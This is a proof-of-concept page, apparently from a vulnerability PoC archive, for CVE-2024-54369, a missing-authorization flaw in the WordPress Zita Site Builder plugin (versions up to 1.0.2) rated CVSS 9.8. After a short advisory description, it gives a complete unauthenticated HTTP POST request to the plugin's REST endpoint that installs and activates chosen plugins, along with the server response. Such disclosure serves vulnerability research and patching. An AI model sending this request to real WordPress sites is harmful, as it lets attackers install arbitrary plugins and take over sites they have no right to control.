CVE-2024-54369 PoC — WordPress Zita Site Builder plugin <= 1.0.2 - Arbitrary Plugin Installation and Activation vulnerability

Source

Associated Vulnerability

Description

Zita Site Builder <= 1.0.2 - Missing Authorization to Arbitrary Plugin Installation

Readme

# CVE-2024-54369
Zita Site Builder <= 1.0.2 - Missing Authorization to Arbitrary Plugin Installation

# Description

The Zita Site Builder plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on one of its functions in versions up to, and including, 1.0.2. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins.

## Details

- **Type**: plugin
- **Slug**: ai-site-builder
- **Affected Version**: 1.0.2
- **CVSS Score**: 9.8
- **CVSS Rating**: Critical
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-54369
- **Status**: Closed

POC
---

```
POST /wp-json/ai/v1/ai-site-builder HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://wp-dev.ddev.site/wp-admin/admin.php?page=ai-site-builder&template=step
Content-Type: application/json
Content-Length: 245
Origin: https://wp-dev.ddev.site
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

{"params":{"templateType":"free","plugin":{"woocommerce":"Woocommerce"},"allPlugins":[{"woocommerce":"woocommerce/woocommerce.php"}],"builder":"th-shop-mania","themeSlug":"th-shop-mania","proThemePlugin":"hunk-companion","tmplFreePro":"plugin"}}
```

```
"\"https:\\\/\\\/wp-dev.ddev.site\""
```

File Snapshot

 [4.0K]  /data/pocs/b5aa1372bc83496452905622bdf5c703e5a030ba
└── [1.5K]  README.md

0 directories, 1 file

Remarks